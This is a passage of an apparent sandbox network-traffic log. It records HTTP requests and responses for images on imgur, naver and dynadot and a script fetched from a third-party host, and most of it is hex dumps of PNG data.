36 6d bd b5 3a eb 76 89 09 94 e7 5d 2e 97 d7 eb Data Ascii: X\ I%/=Pm3dUSWxIiDVT_5d!WY\|{=d~daIRNm~Vo+6[eW/Fxpazzm$%lOZk4ToyxOoxMMSQ\Bx[7Ilm'`^lkC-96m:v].
2025-01-12 00:32:56 UTC	1371	IN	Data Raw: ec 65 dd 4e ef d4 35 bd 37 e0 f3 e9 7e 35 eb 88 98 b7 ca 8b aa 27 24 a5 df bb bc 7f 0b ed e3 47 06 76 12 5f 32 63 89 1a 8a cc 08 b4 fd ee 33 1f 74 81 60 b0 48 49 db 68 69 6f 96 1b d5 e3 f7 af 2a 37 d2 f2 0f 36 cb a2 8c 6c df 57 5b 3e be 8c 5e fd 8d 8b 1d 1b d6 4d b3 f6 25 2c d5 87 35 6a 30 f4 bf fb 60 28 1b ac d8 1f ba d7 7d f9 0f 6e 30 da c9 07 2f ac 8c 50 68 f3 2c cb 47 b4 29 e7 3f a7 cb e9 72 39 9d f2 9f 10 73 50 d3 b5 80 1e e8 ec ec f4 78 3c 29 c9 c9 39 d9 39 d3 4b 4b 67 4e 2f cd ca cc 0a 04 06 dd 58 3f 98 79 ab bc a4 7a b3 36 f8 c4 53 fd 9a 70 d7 54 0d ac d0 2e 2a 8c dd 27 bd 51 9b 1d 76 17 bd bc 86 d1 26 3c 42 7d be 11 59 cd 04 de 50 53 6f 04 5d a3 ae de 6c f7 6e 64 fb b0 36 f6 e3 c4 dc f1 b0 2b 02 7d bd d9 5b d7 3e c2 6a fe fb 33 2f 7f 44 10 ad dc Data Ascii: eN57~5'$Gv_2c3t`HIhio76lW[>^M%,5j0`(}n0/Ph,G)?r9sPx<)99KKgN/X?yz6SpT.'Qv&<B}YPSo]lnd6+}[>j3/D

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:32:56 UTC	346	OUT	GET /g1U1hqo.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:32:57 UTC	723	IN	HTTP/1.1 200 OK Connection: close Content-Length: 26887 Content-Type: image/png Last-Modified: Wed, 06 Oct 2021 21:31:16 GMT ETag: "54e862dc5600e9b3c61157ec356738de" X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: vcanBOUrc02-P0jW5TaZewPKu-8Kl3TvjlKUxNvSH5plVMtn6CzrmA== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Sun, 12 Jan 2025 00:32:56 GMT Age: 2188847 X-Served-By: cache-iad-kiad7000052-IAD, cache-ewr-kewr1740076-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 84, 1 X-Timer: S1736641977.956761,VS0,VE5 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-01-12 00:32:57 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 44 00 00 02 54 08 02 00 00 00 52 6f bb 15 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 68 b1 49 44 41 54 78 5e ed dd 09 9c 1c 75 9d ff ff ea 6b ee fb ce 35 93 53 48 c8 45 88 81 09 08 26 90 98 a0 a2 80 1c 12 f0 5a 75 d9 f5 f7 53 97 75 17 1f 82 fe f9 29 f8 d3 5d 65 5d f7 c7 fe 58 fd 2d 0b 4a 90 33 0a 2b 87 09 04 c2 91 c1 98 84 dc 21 e4 62 72 cd 7d df d3 47 fd 3f 55 f5 ed 9e 9e 99 ee 9e 99 9e 99 24 35 fd 7a da 36 55 df aa ae 6b 66 2a fd ae ef b7 be e5 d0 75 5d 03 00 00 00 00 00 f6 e1 54 ff 05 00 00 00 00 00 36 41 98 07 00 00 00 00 c0 66 08 f3 00 00 00 00 00 d8 0c 61 1e 00 00 00 00 00 9b 21 cc 03 00 00 00 00 60 33 84 79 00 00 00 00 00 6c 86 30 0f 00 00 00 Data Ascii: PNGIHDRDTRosRGBgAMAahIDATx^uk5SHE&ZuSu)]e]X-J3+!br}G?U$5z6Ukf*u]T6Afa!`3yl0
2025-01-12 00:32:57 UTC	1371	IN	Data Raw: 00 b0 19 c2 3c 00 00 00 00 00 36 43 98 07 00 00 00 00 c0 66 08 f3 00 00 00 00 00 d8 0c 61 1e 00 00 00 00 00 9b 21 cc 03 00 00 00 00 60 33 84 79 00 00 00 00 00 6c 86 30 0f 00 00 00 00 80 cd 10 e6 01 00 00 00 00 b0 19 c2 3c 00 00 00 00 00 36 43 98 07 00 00 00 00 c0 66 08 f3 00 00 00 00 00 d8 0c 61 1e 00 00 00 00 00 9b 21 cc 03 00 00 00 00 60 33 84 79 00 00 00 00 00 6c 86 30 0f 00 00 00 00 80 cd 10 e6 01 00 00 00 00 b0 19 c2 3c 00 00 00 00 00 36 43 98 07 00 00 00 00 c0 66 08 f3 00 00 00 00 00 d8 0c 61 1e 00 00 00 00 00 9b 21 cc 03 00 00 00 00 60 33 84 79 00 00 00 00 00 6c 86 30 0f 00 00 00 00 80 cd 10 e6 01 00 00 00 00 b0 19 c2 3c 00 00 00 00 00 36 43 98 07 00 00 00 00 c0 66 08 f3 00 00 00 00 00 d8 0c 61 1e 00 00 00 00 00 9b 21 cc 03 00 00 00 00 60 33 84 79 Data Ascii: <6Cfa!`3yl0<6Cfa!`3yl0<6Cfa!`3yl0<6Cfa!`3y
2025-01-12 00:32:57 UTC	1371	IN	Data Raw: 76 ba 2f cf bc a0 2c b9 50 8d 47 21 1f 3b d5 db b4 b5 ed 03 df 30 f6 5a 66 ae ea 6d 7e ab ed 50 ec ba 68 a7 c3 59 e4 c9 2a cf 9c 93 eb 4e 1b 7e bf 7a b6 23 c7 bc d9 df f9 87 c6 ed 3f 3b f3 c7 16 7f 97 2a 05 00 e0 3c 46 98 07 00 4c 34 01 4d ef 0a f4 3c 5a fb 86 c4 5a 49 c8 c3 ab a6 1e 33 b2 ba a3 dd 35 ef b6 1d 96 55 ab a2 e1 09 e8 fa a1 ae aa bd 1d 46 9f 79 03 b6 d9 e5 70 5e 9c 3e fd c2 d4 c9 49 0e 77 8c 44 2d 9f ea 09 78 ff bb 69 a7 2f 66 65 bb 45 d7 f5 37 5a 0f d4 7a 5b 63 df 63 ef d4 1c 53 93 f2 56 64 cd 73 4a ae 57 65 13 90 1c 02 bf 1e 68 f6 77 3c df b4 63 43 e3 36 b3 4d c7 59 fd b5 01 00 60 a4 08 f3 00 80 09 48 72 58 93 bf f3 87 a7 36 9c ec 69 30 9f 24 7f 96 48 02 ec 0d f8 f6 77 9e da dd 51 39 d2 bb af e5 b3 f2 11 09 d8 a7 8c 3b b7 fb 6d b2 04 f8 64 Data Ascii: v/,PG!;0Zfm~PhYN~z#?;<FL4M<ZZI35UFyp^>IwD-xi/feE7Zz[ccSVdsJWehw<cC6MY`HrX6i0$HwQ9;md
2025-01-12 00:32:57 UTC	1371	IN	Data Raw: d5 6d d9 d7 79 72 cc 53 a2 45 16 7b ac a7 e6 cd d6 83 b1 97 3f 3b a5 f8 a6 fc 4b 17 a5 97 a5 3a 93 a3 35 f6 96 cf 77 f8 7b 7e 5b ff d6 e0 9a 73 a7 c3 91 ed 4e bb 25 7f 79 ec 30 2f 1f 3c d2 5d b3 a7 b3 d2 3b a8 b3 7a 9f 16 38 d0 75 6a 5f 57 ac e3 20 8b 76 3b 9c 57 64 5e 20 5b 6b 36 e9 8f 93 5f d7 65 03 ba 03 de 8e 40 cf f0 5f 9d 81 9e ee 40 af a4 7a b5 94 31 25 c7 3c c7 95 ae 46 62 89 d9 68 01 00 80 f3 00 61 1e 00 90 10 7a 03 be 37 5b df 7f b2 61 6b b3 af 73 cc 83 a2 04 3f bf a6 af af 7f 47 b2 68 b4 14 28 31 52 12 f2 85 a9 93 2f c9 98 b9 3c 73 ce e4 a4 9c 68 cd d7 25 66 fb 75 ff 7f 37 ee a8 f7 b5 0e da 54 87 c7 e1 bc ad 60 79 9a 2b 39 46 9e 0f 68 7a bb bf 7b 77 c7 09 eb 31 fb aa d4 d4 15 e8 dd db 71 e2 78 77 ad 1a 8f cc 78 a4 dc ad f9 cb 3d 0e 57 b4 2b 0e Data Ascii: myrSE{?;K:5w{~[sN%y0/<];z8uj_W v;Wd^ [k6_e@_@z1%<Fbhaz7[aks?Gh(1R/<sh%fu7T`y+9Fhz{w1qxwx=W+
2025-01-12 00:32:57 UTC	1371	IN	Data Raw: 81 4d 4e ca fd 4a e1 55 0b d3 4a cd 56 e8 11 58 6d ce ab bd cd 46 47 6b aa 2c 4e 7e 2d b0 a5 f5 c0 a9 de c6 18 8b 92 58 28 d9 f8 53 b9 4b 24 81 87 b6 47 0a 4b 93 f2 3f 96 79 a1 23 e6 bf c5 cd fe ce 0a e3 be f7 66 35 1e a6 d0 93 29 1f 1f b2 35 b8 55 1b ef d5 fd 6d fe ae 3f b5 ec f1 45 bf 17 40 b6 4d b6 f0 d2 8c d9 1f 49 2d 19 c3 36 f6 b2 d8 91 bf 62 dc 3d 30 2e 64 6d b2 ef d9 ae d4 9b f3 2f 5b 93 b3 68 94 cf e4 03 00 e0 2c 20 cc 03 00 26 1a b7 e6 5c 98 5e f6 85 a2 2b a7 24 e5 8d b2 3f f6 21 b5 f8 3b 5f 6f d9 df e8 6b 57 e3 91 48 4a 9c 97 3a 75 51 7a 59 78 65 af 0c 25 3b 3d 37 17 5c 16 a3 66 5e 48 08 3f d0 75 7a 7b c7 31 35 1e 26 c9 e1 5e 90 36 6d 61 5a a9 1a 8f 4c ef f4 f7 be d8 f4 5e 57 a0 f7 ad b6 f7 ab 7a 9b 63 dc 58 20 c7 6a 6a 72 fe 92 f4 19 39 ae f4 Data Ascii: MNJUJVXmFGk,N~-X(SK$GK?y#f5)5Um?E@MI-6b=0.dm/[h, &\^+$?!;_okWHJ:uQzYxe%;=7\f^H?uz{15&^6maZL^WzcX jjr9
2025-01-12 00:32:57 UTC	1371	IN	Data Raw: cf e8 1e 3f 96 1a 6f cb 3b ed 1f bc d8 fc de 7f 37 ed 1c fe eb 8f 4d ef e5 ba d2 66 a5 14 4b 38 b7 76 55 92 f6 b1 9e da 4d 2d 7b 1b a2 3f 05 50 c2 bc db e1 5c 9b 73 f1 c7 b3 e7 e6 ba 33 32 5d a9 f2 fb 30 35 39 af b2 a7 fe 70 77 75 b4 4b 03 b2 7c f9 ad 38 d4 5d b5 28 bd 6c 4a 52 ee d9 7f 2a 1e 00 00 f1 a1 66 1e 00 30 c1 39 35 47 86 2b f5 13 d9 0b 3f 97 77 a9 47 1b 56 58 8d 4d d7 75 c9 a8 5b 5a 0f 76 05 62 75 29 37 d6 f4 9d 1d 1f 1e e8 3a 3d b8 2d 80 44 cf 8f 65 5e 30 3d b9 d0 15 d7 3f eb 92 5d 33 5c 29 9f c9 5d 9a e4 18 b3 ae ef 2c 7e 3d f0 61 4f dd 5b ad ef 6f 6e d9 3f d2 d7 89 de 06 9f 44 f8 91 1f 5e c9 e2 c6 c3 ed cd 97 c7 e1 9a 95 5c 7c 5b e1 e5 03 ae ef 84 93 15 f8 74 ff 89 9e fa 1f 9c 7c fa 74 6f 63 80 c7 fc 00 00 6c 82 30 0f 00 98 f8 24 ee 96 24 e5 Data Ascii: ?o;7MfK8vUM-{?P\s32]059pwuK\|8](lJR*f095G+?wGVXMu[Zvbu)7:=-De^0=?]3\)],~=aO[on?D^\\|[t\|tocl0$$
2025-01-12 00:32:57 UTC	1371	IN	Data Raw: a8 2b be 31 21 db f6 3f 4b d6 5c 9f f7 d1 14 67 92 95 cb 7d e6 1a ff a5 fa a5 93 3d 0d 66 41 64 1e 87 4b 7e 58 f2 c1 68 cf cc 97 c3 d2 e8 6b 7f b8 e6 d5 97 9a de 8b 7d 88 d2 9c 49 6b 72 16 7f b5 68 45 5e cc 67 da 01 00 70 ae 10 e6 01 00 36 20 b9 eb 44 4f 7d 77 c0 ab c6 a3 48 72 ba 0b dd 99 e9 c3 78 42 9b 44 d0 5e dd 7f ba a7 d1 ab fb 62 fc 43 e8 74 38 32 5d a9 05 ee 4c 49 89 32 da ab fb 2a 7b ea 25 ca 5a 53 a3 91 99 25 01 66 bb 53 9d 23 69 01 67 6d 52 ad b7 a5 c3 3f f0 49 f2 03 c8 56 e5 ba d2 65 15 83 43 b8 6c 5b 83 af ad d9 df 19 18 c6 bf ef 19 ae e4 22 4f b6 6c ad 63 a8 c3 35 80 fc 38 3a fc dd d5 de 96 21 0f 45 dc 8a 3c 59 39 ae f4 50 7b 78 59 63 a7 bf a7 ce d7 d6 13 f3 77 c0 e5 70 e4 bb 33 73 5c 69 ce e8 97 27 64 9b 9b fd 1d 0d be f6 d8 87 48 56 9c ea Data Ascii: +1!?K\g}=fAdK~Xhk}IkrhE^gp6 DO}wHrxBD^bCt82]LI2*{%ZS%fS#igmR?IVeCl["Olc58:!E<Y9P{xYcwp3s\i'dHV
2025-01-12 00:32:57 UTC	1371	IN	Data Raw: 00 36 43 98 07 80 71 11 d0 03 5e dd df ab fb 86 f3 f2 eb 01 f5 31 c0 ce 74 5d 0f 98 fc e6 cb 22 85 e1 53 ad 49 a1 19 42 53 01 00 c0 88 38 f8 47 14 40 02 aa a8 a8 28 2f 2f 57 23 63 4d 92 79 bd af ed 68 4f cd 99 9e 26 bf 36 74 4a 77 69 ce 49 49 b9 b3 52 8a f2 dd 99 1e 87 4b 95 02 a3 23 ff be 9f 39 73 c6 eb f3 15 17 97 38 9d e3 7e ed 5e 56 e7 f7 fb 1b 1a 9b 1a 9b 9a 24 a2 ab 52 4d 93 55 17 e4 e7 e7 e7 e5 ca 0c 32 b5 a1 b1 71 c0 d4 bc dc 5c 79 b9 dd 2e 87 c3 a1 4a 81 91 a8 ab ad 99 3a 75 aa 1a 01 80 44 42 98 07 90 88 c6 35 cc d7 f9 5a ff f7 a9 e7 5f 6e de 95 e5 4a 75 68 c6 ff 62 93 f3 70 bb bf e7 ea 9c f9 df 9d 7c dd e4 a4 5c 55 0a 8c ce 59 0e f3 12 d1 6b 6a eb fe f0 c7 97 03 fe 80 db ed 56 bf f6 ba e6 f5 7a 65 ed eb 6e b9 51 66 58 ff d4 73 52 e6 49 f2 98 d3 Data Ascii: 6Cq^1t]"SIBS8G@(//W#cMyhO&6tJwiIIRK#9s8~^V$RMU2q\y.J:uDB5Z_nJuhbp\|\UYkjVzenQfXsRI
2025-01-12 00:32:57 UTC	1371	IN	Data Raw: 97 d3 bf 58 96 5c 20 49 25 a0 99 2f 3d 50 eb 6d fd e7 33 7f fc ee 89 df b5 fa bb a4 64 04 55 95 53 57 de 78 93 b6 e1 b6 49 fd d3 69 44 56 54 be 5f 35 c8 af d0 96 97 df ab a6 98 64 21 9b 57 59 d3 b6 de af dd bb 7c e8 05 8a 7b 97 df a5 3d 64 7e a6 ea 89 1b 64 09 61 49 d8 52 be f2 87 92 83 82 17 1b 4e 6d 7e ee 19 f9 cf ce e3 2a e8 56 6f fe fd 06 ed 87 2b 83 cd 0a 8c 36 fc 5b 65 fe 9b d6 57 05 2f 46 18 ab 78 70 86 8c 1a 2a ee 8f b4 8a 61 91 f0 dc b7 ef 7a d5 7a 6d dd 24 15 95 25 6c 4f 5a a7 19 6b 34 54 dc 7f 6f 79 78 9e d7 ee bd ed b9 1b 4f 9a 93 be bf d4 18 ff c1 f2 6f 04 f7 78 fd 4d 1b d6 4d 53 51 5c 42 78 f8 cd 0e 5b 7f d8 37 49 6c b8 6d f9 f1 bb cc 09 27 d7 df 60 5e aa f8 d9 6c 6b 85 b2 90 be 43 2d 1b 39 e9 36 6d bd b5 3a eb 76 89 09 94 e7 5d 2e 97 d7 eb Data Ascii: X\ I%/=Pm3dUSWxIiDVT_5d!WY\|{=d~daIRNm~Vo+6[eW/Fxpazzm$%lOZk4ToyxOoxMMSQ\Bx[7Ilm'`^lkC-96m:v].
2025-01-12 00:32:57 UTC	1371	IN	Data Raw: ec 65 dd 4e ef d4 35 bd 37 e0 f3 e9 7e 35 eb 88 98 b7 ca 8b aa 27 24 a5 df bb bc 7f 0b ed e3 47 06 76 12 5f 32 63 89 1a 8a cc 08 b4 fd ee 33 1f 74 81 60 b0 48 49 db 68 69 6f 96 1b d5 e3 f7 af 2a 37 d2 f2 0f 36 cb a2 8c 6c df 57 5b 3e be 8c 5e fd 8d 8b 1d 1b d6 4d b3 f6 25 2c d5 87 35 6a 30 f4 bf fb 60 28 1b ac d8 1f ba d7 7d f9 0f 6e 30 da c9 07 2f ac 8c 50 68 f3 2c cb 47 b4 29 e7 3f a7 cb e9 72 39 9d f2 9f 10 73 50 d3 b5 80 1e e8 ec ec f4 78 3c 29 c9 c9 39 d9 39 d3 4b 4b 67 4e 2f cd ca cc 0a 04 06 dd 58 3f 98 79 ab bc a4 7a b3 36 f8 c4 53 fd 9a 70 d7 54 0d ac d0 2e 2a 8c dd 27 bd 51 9b 1d 76 17 bd bc 86 d1 26 3c 42 7d be 11 59 cd 04 de 50 53 6f 04 5d a3 ae de 6c f7 6e 64 fb b0 36 f6 e3 c4 dc f1 b0 2b 02 7d bd d9 5b d7 3e c2 6a fe fb 33 2f 7f 44 10 ad dc Data Ascii: eN57~5'$Gv_2c3t`HIhio76lW[>^M%,5j0`(}n0/Ph,G)?r9sPx<)99KKgN/X?yz6SpT.'Qv&<B}YPSo]lnd6+}[>j3/D

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:32:59 UTC	353	OUT	GET /favicon_1024.png HTTP/1.1 Host: nid.naver.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:33:00 UTC	634	IN	HTTP/1.1 200 OK date: Sun, 12 Jan 2025 00:33:00 GMT content-type: image/png content-length: 3919 last-modified: Tue, 20 Aug 2024 11:04:13 GMT etag: "66c4782d-f4f" accept-ch: dpr,device-memory,viewport-width,rtt,downlink,ect,lang accept-ch: ua-arch,ua-platform,ua-platform-version,ua-model,ua-full-version,ua,ua-mobile accept-ch: sec-ch-ua-arch,sec-ch-ua-platform,sec-ch-ua-platform-version,sec-ch-ua-model,sec-ch-ua-full-version,sec-ch-ua-full-version-list,sec-ch-ua,sec-ch-ua-mobile accept-ch-lifetime: 86400 x-ua-compatible: IE=edge accept-ranges: bytes referrer-policy: unsafe-url server: nfront connection: close
2025-01-12 00:33:00 UTC	3919	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 72 00 00 00 72 08 02 00 00 00 00 bf 12 2a 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b Data Ascii: PNGIHDRrrpHYsOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:19 UTC	609	OUT	GET /tr/mainsite2023/navbar-logo-dark-2023.png HTTP/1.1 Host: www.dynadot.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:33:19 UTC	448	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 00:33:19 GMT Content-Type: image/png Content-Length: 4843 Connection: close X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=2592000 Cache-Control: public, max-age=1209600 Expires: Sun, 26 Jan 2025 00:33:19 GMT ETag: 1736585746473 CF-Cache-Status: HIT Age: 56242 Accept-Ranges: bytes Access-Control-Allow-Origin: *.mouseflow.com Server: cloudflare CF-RAY: 90090defed64f5fa-EWR
2025-01-12 00:33:19 UTC	921	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 22 00 00 00 44 08 06 00 00 00 25 64 38 45 00 00 12 b2 49 44 41 54 78 5e ed 5d 6b 92 1b b7 11 5e ed ca 55 ca b3 c8 95 55 89 aa f2 83 fe eb 5f f2 0d b8 bb ce c3 29 57 c5 f9 e1 df 71 4e 20 e5 04 d2 09 22 9d c0 ab 13 c4 39 81 75 03 e9 06 e2 0d b4 37 60 d2 8d c1 90 33 00 ba fb c3 3c 38 c3 25 58 c5 92 76 1e 40 a3 1f 1f fa 01 80 67 67 c7 f0 59 ac d7 e7 97 37 cf 2f 96 d7 3f 9d 5f 5e 6f 2e 2e af ef e8 fb 3f ff bd a3 6b 1f aa 7b 37 cf cf e8 d9 63 18 52 a1 b1 70 a0 70 e0 18 38 b0 58 2f 08 60 5e 06 a0 53 83 8f f5 ef 86 df 25 50 5a 1d c3 50 0b 8d 85 03 85 03 73 e3 40 3f 00 8a 00 ca 03 d2 62 6e c3 2c f4 14 0e 14 0e cc 91 03 03 03 50 23 74 63 70 da 3c 2c 21 db 1c a5 5e 68 2a 1c 98 09 07 c6 05 a0 96 87 e4 bc a3 f2 Data Ascii: PNGIHDR"D%d8EIDATx^]k^UU_)WqN "9u7`3<8%Xv@ggY7/?_^o..?k{7cRpp8X/`^S%PZPs@?bn,P#tcp<,!^h*
2025-01-12 00:33:19 UTC	1369	IN	Data Raw: cb be 63 f2 9d db 0e fb 63 59 8c fd 69 f7 29 f6 77 10 20 1a 69 fc 07 a9 9a 35 e5 04 6d 26 e5 04 71 d7 73 88 1a bf 5b f6 19 01 49 1f 1d b1 ce 27 ea d3 76 d6 bb 6e 41 28 ff 3e 9b 3b 9b 29 5c 93 75 e7 42 d4 44 8e 2d 0b 88 b8 34 aa 7d 73 79 c9 13 81 de de 7a c7 03 8e aa ad e7 9b 0c 5b b9 e7 79 7d da 2d 79 d1 a9 13 3b f9 da 6d 8a 27 59 7c f7 46 57 a7 03 84 be dc 24 e8 ee 91 1c 06 49 13 34 fb cd 90 f9 28 40 e4 79 4d 91 c1 9b f3 c7 2e 3a 08 f5 af 1e 3f df fb c9 f1 1c 01 e7 84 cc 2d 7b 63 99 46 3a 95 25 d0 e0 61 77 64 87 bc 36 27 f4 6e fa fc cd 1e d6 aa 0b ad fe 58 5a ad ef db 2e ed e6 be 93 79 3e 77 eb 57 47 54 1e 07 1e 91 09 fc 99 1e 14 87 ad 4a ff 5b 32 dc dd f6 18 64 36 74 7c ab 94 f7 0b 93 d6 b6 6e 7d cc ae c8 7a 23 01 0c 43 d4 0f 1a df 7b d2 bd ec 89 b0 da Data Ascii: ccYi)w i5m&qs[I'vnA(>;)\uBD-4}syz[y}-y;m'Y\|FW$I4(@yM.:?-{cF:%awd6'nXZ.y>wWGTJ[2d6t\|n}z#C{
2025-01-12 00:33:19 UTC	1369	IN	Data Raw: 6b e8 71 1b 88 b0 70 d0 f4 c4 6a 3a 20 6f 30 e4 e1 be 5c 2f 3a 07 ce 1b ca f8 00 80 d8 5a cc 5a 37 0d e8 00 0e 44 b9 20 c4 82 ab 95 da 98 c1 b1 03 c8 74 43 10 99 dd 34 1e 06 20 0e 6d 92 79 88 0c 81 64 3f 6a 84 44 44 17 96 27 ab 3b b6 80 4d 01 22 2b 3c 93 ca f8 04 7e da 09 7b a2 57 01 28 a1 bc 21 3a 60 34 62 08 d9 b2 49 bd b0 df 73 f5 ac b1 fd 46 d3 b1 b6 41 db e1 20 e7 25 71 10 a8 81 4d cb 53 05 40 84 f0 9d 6c 03 f2 c8 32 00 85 79 14 b5 09 d0 82 01 11 81 d0 4b 65 36 6c 09 88 8d 2a 5c 57 60 2b bf 52 7e f7 5c c8 a1 21 a4 75 32 00 f2 b4 9b 1e 4c 46 58 56 2b 85 ea f6 2b 40 c4 ef 13 7f 36 21 8f 1a 7f 47 a0 08 e4 07 22 e5 cb 50 5e 4c 09 a9 c1 c1 81 a8 f2 1a 9e f1 1e 27 57 2d e2 fd 6d ca 9e 2b 85 67 2d 50 79 fa f4 5b 2a e4 dc fc 5d 79 9e ab b4 c9 50 b6 e6 5b f8 Data Ascii: kqpj: o0\/:ZZ7D tC4 myd?jDD';M"+<~{W(!:`4bIsFA %qMS@l2yKe6l\W`+R~\!u2LFXV++@6!G"P^L'W-m+g-Py[]yP[
2025-01-12 00:33:19 UTC	1184	IN	Data Raw: 0c 5e 51 93 f7 a4 88 1c 82 61 e0 d3 04 e1 0c 20 82 dc f7 36 c0 27 13 92 92 cc 01 25 4c e7 07 12 0d 02 86 bd 6d be 06 7a 04 0c 06 d5 8a fe 86 f1 65 81 40 62 35 31 d3 91 d1 ff 0e ec 59 e6 5e ee d1 04 a0 d8 65 9c 23 aa 19 81 85 96 79 7d c5 13 be 78 fa 02 93 01 e8 40 dd 7f f5 3b 7e a4 bf c4 83 8f bc 29 52 22 6c 3e 40 94 01 40 2d 6f 23 a1 e0 87 bc 84 cc 2e 0a ff 25 b9 b4 af 67 00 51 07 63 81 c3 32 50 09 47 03 22 ee 9f 93 c6 ae d0 21 eb 34 c6 53 fd fd a4 47 c4 fd 03 e0 39 44 ff 32 10 11 0d f0 e1 6a fa 18 45 3a cd 94 02 b2 9c 21 ee 7b cb cb ff c5 59 78 f2 1c 51 17 00 6a 0c b2 eb 42 cc c1 c0 8a dc d7 be 86 e1 df 97 8d 2b 03 88 6a 63 25 43 95 db 6b 2a 09 98 dc ac f9 05 cc 86 a3 02 91 db 09 bf 58 eb 3b e1 63 23 88 8d 4e af ee 8a 40 54 57 af 86 90 39 17 6f 44 40 35 Data Ascii: ^Qa 6'%Lmze@b51Y^e#y}x@;~)R"l>@@-o#.%gQc2PG"!4SG9D2jE:!{YxQjB+jc%Ck*X;c#N@TW9oD@5

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:19 UTC	557	OUT	GET /sxp/i/c4601e5f6cdd73216cafdd5af209201c.js HTTP/1.1 Host: euob.netgreencolumn.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:33:19 UTC	507	IN	HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: Caddy Date: Sat, 11 Jan 2025 23:43:54 GMT Cache-Control: max-age=43200 Expires: Sun, 12 Jan 2025 11:29:20 GMT ETag: "1a067-h47LxtAMTVpkm/jIU9A3aGADhWY" Vary: Accept-Encoding X-Cache: Hit from cloudfront Via: 1.1 387adc951beb5181d840dfb5d1f09488.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P4 X-Amz-Cf-Id: cypZ4pbD6ke20wEerJiEUtFpRHRKppM8dOwGRmZpAjMyxnc1FR7IXA== Age: 3839
